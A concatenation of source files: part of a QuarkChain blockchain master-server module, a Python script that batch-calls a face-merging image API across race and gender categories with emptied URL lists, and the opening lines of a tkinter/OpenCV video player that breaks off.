slave.write_rpc_request(ClusterOp.GET_ACCOUNT_DATA_REQUEST, request)
)
responses = await asyncio.gather(*futures)
# Slaves may run multiple copies of the same branch
# We only need one AccountBranchData per branch
branch_to_account_branch_data = dict()
for response in responses:
_, response, _ = response
check(response.error_code == 0)
for account_branch_data in response.account_branch_data_list:
branch_to_account_branch_data[
account_branch_data.branch
] = account_branch_data
check(
len(branch_to_account_branch_data)
== len(self.env.quark_chain_config.get_genesis_shard_ids())
)
return branch_to_account_branch_data
async def get_primary_account_data(
self, address: Address, block_height: Optional[int] = None
):
# TODO: Only query the shard who has the address
shard_id = address.get_shard_id(self.__get_shard_size())
branch = Branch.create(self.__get_shard_size(), shard_id)
slaves = self.branch_to_slaves.get(branch.value, None)
if not slaves:
return None
slave = slaves[0]
request = GetAccountDataRequest(address, block_height)
_, resp, _ = await slave.write_rpc_request(
ClusterOp.GET_ACCOUNT_DATA_REQUEST, request
)
for account_branch_data in resp.account_branch_data_list:
if account_branch_data.branch == branch:
return account_branch_data
return None
async def add_transaction(self, tx, from_peer=None):
""" Add transaction to the cluster and broadcast to peers """
evm_tx = tx.code.get_evm_transaction()
evm_tx.set_shard_size(self.__get_shard_size())
branch = Branch.create(self.__get_shard_size(), evm_tx.from_shard_id())
if branch.value not in self.branch_to_slaves:
return False
futures = []
for slave in self.branch_to_slaves[branch.value]:
futures.append(slave.add_transaction(tx))
success = all(await asyncio.gather(*futures))
if not success:
return False
if self.network is not None:
for peer in self.network.iterate_peers():
if peer == from_peer:
continue
try:
peer.send_transaction(tx)
except Exception:
Logger.log_exception()
return True
async def execute_transaction(
self, tx: Transaction, from_address, block_height: Optional[int]
) -> Optional[bytes]:
""" Execute transaction without persistence """
evm_tx = tx.code.get_evm_transaction()
evm_tx.set_shard_size(self.__get_shard_size())
branch = Branch.create(self.__get_shard_size(), evm_tx.from_shard_id())
if branch.value not in self.branch_to_slaves:
return None
futures = []
for slave in self.branch_to_slaves[branch.value]:
futures.append(slave.execute_transaction(tx, from_address, block_height))
responses = await asyncio.gather(*futures)
# failed response will return as None
success = all(r is not None for r in responses) and len(set(responses)) == 1
if not success:
return None
check(len(responses) >= 1)
return responses[0]
def handle_new_root_block_header(self, header, peer):
self.synchronizer.add_task(header, peer)
async def add_root_block(self, r_block):
""" Add root block locally and broadcast root block to all shards and .
All update root block should be done in serial to avoid inconsistent global root block state.
"""
self.root_state.validate_block(r_block) # throw exception if failed
update_tip = False
try:
update_tip = self.root_state.add_block(r_block)
success = True
except ValueError:
Logger.log_exception()
success = False
try:
if update_tip and self.network is not None:
for peer in self.network.iterate_peers():
peer.send_updated_tip()
except Exception:
pass
if success:
future_list = self.broadcast_rpc(
op=ClusterOp.ADD_ROOT_BLOCK_REQUEST,
req=AddRootBlockRequest(r_block, False),
)
result_list = await asyncio.gather(*future_list)
check(all([resp.error_code == 0 for _, resp, _ in result_list]))
async def add_raw_minor_block(self, branch, block_data):
if branch.value not in self.branch_to_slaves:
return False
request = AddMinorBlockRequest(block_data)
# TODO: support multiple slaves running the same shard
_, resp, _ = await self.get_slave_connection(branch).write_rpc_request(
ClusterOp.ADD_MINOR_BLOCK_REQUEST, request
)
return resp.error_code == 0
async def add_root_block_from_miner(self, block):
""" Should only be called by miner """
# TODO: push candidate block to miner
if block.header.hash_prev_block != self.root_state.tip.get_hash():
Logger.info(
"[R] dropped stale root block {} mined locally".format(
block.header.height
)
)
return False
await self.add_root_block(block)
def broadcast_command(self, op, cmd):
""" Broadcast command to all slaves.
"""
for slave_conn in self.slave_pool:
slave_conn.write_command(
op=op, cmd=cmd, metadata=ClusterMetadata(ROOT_BRANCH, 0)
)
def broadcast_rpc(self, op, req):
""" Broadcast RPC request to all slaves.
"""
future_list = []
for slave_conn in self.slave_pool:
future_list.append(
slave_conn.write_rpc_request(
op=op, cmd=req, metadata=ClusterMetadata(ROOT_BRANCH, 0)
)
)
return future_list
# ------------------------------ Cluster Peer Connection Management --------------
def get_peer(self, cluster_peer_id):
if self.network is None:
return None
return self.network.get_peer_by_cluster_peer_id(cluster_peer_id)
async def create_peer_cluster_connections(self, cluster_peer_id):
future_list = self.broadcast_rpc(
op=ClusterOp.CREATE_CLUSTER_PEER_CONNECTION_REQUEST,
req=CreateClusterPeerConnectionRequest(cluster_peer_id),
)
result_list = await asyncio.gather(*future_list)
# TODO: Check result_list
return
def destroy_peer_cluster_connections(self, cluster_peer_id):
# Broadcast connection lost to all slaves
self.broadcast_command(
op=ClusterOp.DESTROY_CLUSTER_PEER_CONNECTION_COMMAND,
cmd=DestroyClusterPeerConnectionCommand(cluster_peer_id),
)
async def set_target_block_time(self, root_block_time, minor_block_time):
root_block_time = (
root_block_time
if root_block_time
else self.artificial_tx_config.target_root_block_time
)
minor_block_time = (
minor_block_time
if minor_block_time
else self.artificial_tx_config.target_minor_block_time
)
self.artificial_tx_config = ArtificialTxConfig(
target_root_block_time=root_block_time,
target_minor_block_time=minor_block_time,
)
await self.start_mining()
async def set_mining(self, mining):
if mining:
await self.start_mining()
else:
await self.stop_mining()
async def create_transactions(
self, num_tx_per_shard, xshard_percent, tx: Transaction
):
"""Create transactions and add to the network for load testing"""
futures = []
for slave in self.slave_pool:
request = GenTxRequest(num_tx_per_shard, xshard_percent, tx)
futures.append(slave.write_rpc_request(ClusterOp.GEN_TX_REQUEST, request))
responses = await asyncio.gather(*futures)
check(all([resp.error_code == 0 for _, resp, _ in responses]))
def update_shard_stats(self, shard_state):
self.branch_to_shard_stats[shard_state.branch.value] = shard_state
def update_tx_count_history(self, tx_count, xshard_tx_count, timestamp):
""" maintain a list of tuples of (epoch minute, tx count, xshard tx count) of 12 hours window
Note that this is also counting transactions on forks and thus larger than if only couting the best chains. """
minute = int(timestamp / 60) * 60
if len(self.tx_count_history) == 0 or self.tx_count_history[-1][0] < minute:
self.tx_count_history.append((minute, tx_count, xshard_tx_count))
else:
old = self.tx_count_history.pop()
self.tx_count_history.append(
(old[0], old[1] + tx_count, old[2] + xshard_tx_count)
)
while (
len(self.tx_count_history) > 0
and self.tx_count_history[0][0] < time.time() - 3600 * 12
):
self.tx_count_history.popleft()
async def get_stats(self):
shards = [dict() for i in range(self.__get_shard_size())]
for shard_stats in self.branch_to_shard_stats.values():
shard_id = shard_stats.branch.get_shard_id()
shards[shard_id]["height"] = shard_stats.height
shards[shard_id]["timestamp"] = shard_stats.timestamp
shards[shard_id]["txCount60s"] = shard_stats.tx_count60s
shards[shard_id]["pendingTxCount"] = shard_stats.pending_tx_count
shards[shard_id]["totalTxCount"] = shard_stats.total_tx_count
shards[shard_id]["blockCount60s"] = shard_stats.block_count60s
shards[shard_id]["staleBlockCount60s"] = shard_stats.stale_block_count60s
shards[shard_id]["lastBlockTime"] = shard_stats.last_block_time
tx_count60s = sum(
[
shard_stats.tx_count60s
for shard_stats in self.branch_to_shard_stats.values()
]
)
block_count60s = sum(
[
shard_stats.block_count60s
for shard_stats in self.branch_to_shard_stats.values()
]
)
pending_tx_count = sum(
[
shard_stats.pending_tx_count
for shard_stats in self.branch_to_shard_stats.values()
]
)
stale_block_count60s = sum(
[
shard_stats.stale_block_count60s
for shard_stats in self.branch_to_shard_stats.values()
]
)
total_tx_count = sum(
[
shard_stats.total_tx_count
for shard_stats in self.branch_to_shard_stats.values()
]
)
root_last_block_time = 0
if self.root_state.tip.height >= 3:
prev = self.root_state.db.get_root_block_by_hash(
self.root_state.tip.hash_prev_block
)
root_last_block_time = (
self.root_state.tip.create_time - prev.header.create_time
)
tx_count_history = []
for item in self.tx_count_history:
tx_count_history.append(
{"timestamp": item[0], "txCount": item[1], "xShardTxCount": item[2]}
)
return {
"shardServerCount": len(self.slave_pool),
"shardSize": self.__get_shard_size(),
"rootHeight": self.root_state.tip.height,
"rootTimestamp": self.root_state.tip.create_time,
"rootLastBlockTime": root_last_block_time,
"txCount60s": tx_count60s,
"blockCount60s": block_count60s,
"staleBlockCount60s": stale_block_count60s,
"pendingTxCount": pending_tx_count,
"totalTxCount": total_tx_count,
"syncing": self.synchronizer.running,
"mining": self.root_miner.is_enabled(),
"shards": shards,
"peers": [
"{}:{}".format(peer.ip, peer.port)
for _, peer in self.network.active_peer_pool.items()
],
"minor_block_interval": self.get_artificial_tx_config().target_minor_block_time,
"root_block_interval": self.get_artificial_tx_config().target_root_block_time,
"cpus": psutil.cpu_percent(percpu=True),
"txCountHistory": tx_count_history,
}
def is_syncing(self):
return self.synchronizer.running
def is_mining(self):
return self.root_miner.is_enabled()
async def get_minor_block_by_hash(self, block_hash, branch):
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_minor_block_by_hash(block_hash, branch)
async def get_minor_block_by_height(self, height: Optional[int], branch):
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
# use latest height if not specified
height = (
height
if height is not None
else self.branch_to_shard_stats[branch.value].height
)
return await slave.get_minor_block_by_height(height, branch)
async def get_transaction_by_hash(self, tx_hash, branch):
""" Returns (MinorBlock, i) where i is the index of the tx in the block tx_list """
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_transaction_by_hash(tx_hash, branch)
async def get_transaction_receipt(
self, tx_hash, branch
) -> Optional[Tuple[MinorBlock, int, TransactionReceipt]]:
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_transaction_receipt(tx_hash, branch)
async def get_transactions_by_address(self, address, start, limit):
branch = Branch.create(
self.__get_shard_size(), address.get_shard_id(self.__get_shard_size())
)
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_transactions_by_address(address, start, limit)
async def get_logs(
self,
addresses: List[Address],
topics: List[List[bytes]],
start_block: Union[int, str],
end_block: Union[int, str],
branch: Branch,
) -> Optional[List[Log]]:
if branch.value not in self.branch_to_slaves:
return None
if start_block == "latest":
start_block = self.branch_to_shard_stats[branch.value].height
if end_block == "latest":
end_block = self.branch_to_shard_stats[branch.value].height
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_logs(branch, addresses, topics, start_block, end_block)
async def estimate_gas(
self, tx: Transaction, from_address: Address
) -> Optional[int]:
evm_tx = tx.code.get_evm_transaction()
evm_tx.set_shard_size(self.__get_shard_size())
branch = Branch.create(self.__get_shard_size(), evm_tx.from_shard_id())
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.estimate_gas(tx, from_address)
async def get_storage_at(
self, address: Address, key: int, block_height: Optional[int]
) -> Optional[bytes]:
shard_size = self.__get_shard_size()
shard_id = address.get_shard_id(shard_size)
branch = Branch.create(shard_size, shard_id)
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_storage_at(address, key, block_height)
async def get_code(
self, address: Address, block_height: Optional[int]
) -> Optional[bytes]:
shard_size = self.__get_shard_size()
shard_id = address.get_shard_id(shard_size)
branch = Branch.create(shard_size, shard_id)
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_code(address, block_height)
async def gas_price(self, branch: Branch) -> Optional[int]:
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.gas_price(branch)
async def get_work(self, branch: Optional[Branch]) -> Optional[MiningWork]:
if not branch: # get root chain work
return await self.root_miner.get_work()
if branch.value not in self.branch_to_slaves:
return None
slave = self.branch_to_slaves[branch.value][0]
return await slave.get_work(branch)
async def submit_work(
self, branch: Optional[Branch], header_hash: bytes, nonce: int, mixhash: bytes
) -> bool:
if not branch: # submit root chain work
return await self.root_miner.submit_work(header_hash, nonce, mixhash)
if branch.value not in self.branch_to_slaves:
return False
slave = self.branch_to_slaves[branch.value][0]
return await slave.submit_work(branch, header_hash, nonce, mixhash)
def parse_args():
parser = argparse.ArgumentParser()
ClusterConfig.attach_arguments(parser)
args = parser.parse_args()
env = DEFAULT_ENV.copy()
env.cluster_config = ClusterConfig.create_from_args(args)
# initialize database
if not env.cluster_config.use_mem_db():
env.db = PersistentDb(
"{path}/master.db".format(path=env.cluster_config.DB_PATH_ROOT),
clean=env.cluster_config.CLEAN,
)
return env
def main():
from quarkchain.cluster.jsonrpc import JSONRPCServer
env = parse_args()
root_state = RootState(env)
master = MasterServer(env, root_state)
master.start()
master.wait_until_cluster_active()
# kick off mining
if env.cluster_config.MINE:
asyncio.ensure_future(master.start_mining())
network = (
P2PNetwork(env, master)
if env.cluster_config.use_p2p()
else SimpleNetwork(env, master)
)
network.start()
if env.cluster_config.use_p2p():
thread = Thread(target=devp2p_app, args=[env, network], daemon=True)
thread.start()
public_json_rpc_server = JSONRPCServer.start_public_server(env, master)
private_json_rpc_server = JSONRPCServer.start_private_server(env, master)
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(master.shutdown_future)
except KeyboardInterrupt:
pass
public_json_rpc_server.shutdown()
private_json_rpc_server.shutdown()
Logger.info("Master server is shutdown")
if __name__ == "__main__":
main()
|
older.py | #coding = utf-8
#running in python3.6
import requests
import base64
from multiprocessing import Process
url_test = 'http://xxxxxxx'#接口
black_w = [
]
black_m = [
]
white_w =[
]
white_m = [
]
yellow_w = [
yellow_m = [
]
bw = [
]
bm = [
]
ww = [
]
wm = [
]
yw = [
"
]
ym = [
]
def bmm():
count = 0
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":30
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_30_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":40
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_40_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":50
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_50_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":60
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_60_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":70
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_70_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":80
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_80_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_m:
for j in bm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":90
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_man_90_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
def bww():
count = 0
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":30
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_30_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":40
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_40_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":50
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_50_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":60
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_60_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":70
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_70_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":80
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_80_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in black_w:
for j in bw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":90
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('black_woman_90_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
def www():
count = 0
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":30
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_30_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":40
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_40_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":50
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_50_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":60
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_60_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":70
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_70_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":80
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_80_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_w:
for j in ww:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":90
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_woman_90_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
def wmm():
count = 0
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":30
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_30_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":40
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_40_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":50
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_50_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":60
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_60_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":70
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_70_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":80
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_80_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in white_m:
for j in wm:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":90
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('white_man_90_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
def ymm():
count = 0
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":30
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_30_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":40
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_40_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":50
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_50_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":60
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_60_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":70
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_70_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":80
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_80_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_m:
for j in ym:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":90
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_man_90_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
def yww():
count = 0
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":30
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_30_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":40
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_40_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":50
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_50_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":60
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_60_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":70
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_70_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":80
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_80_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
for i in yellow_w:
for j in yw:
params_up = {
"merge_url":"%s"%j,
"template_rectangle":"",
"template_url":"%s"%i,
"merge_rectangle":"",
"merge_rate":90
}
print(params_up)
r = requests.post(url_test, json=params_up)
strs = r.text
try:
imgadata = base64.b64decode(strs)
count = count+1
file = open('yellow_woman_90_NO%s.jpg'%count, 'wb')
file.write(imgadata)
file.close()
except:
pass
if __name__ == '__main__' :
Process(target=bmm).start()
Process(target=bww).start()
Process(target=www).start()
Process(target=wmm).start()
Process(target=ymm).start()
Process(target=yww).start()
#template_url 为模板
#merge_url 为自己
#print(r.text)
|
main.py | import tkinter
import cv2
import PIL.Image,PIL.ImageTk
from functools import partial
import threading
import time
import imutils
stream =cv2.VideoCapture("clip.mp4")
flag=True
def play(speed):
global flag
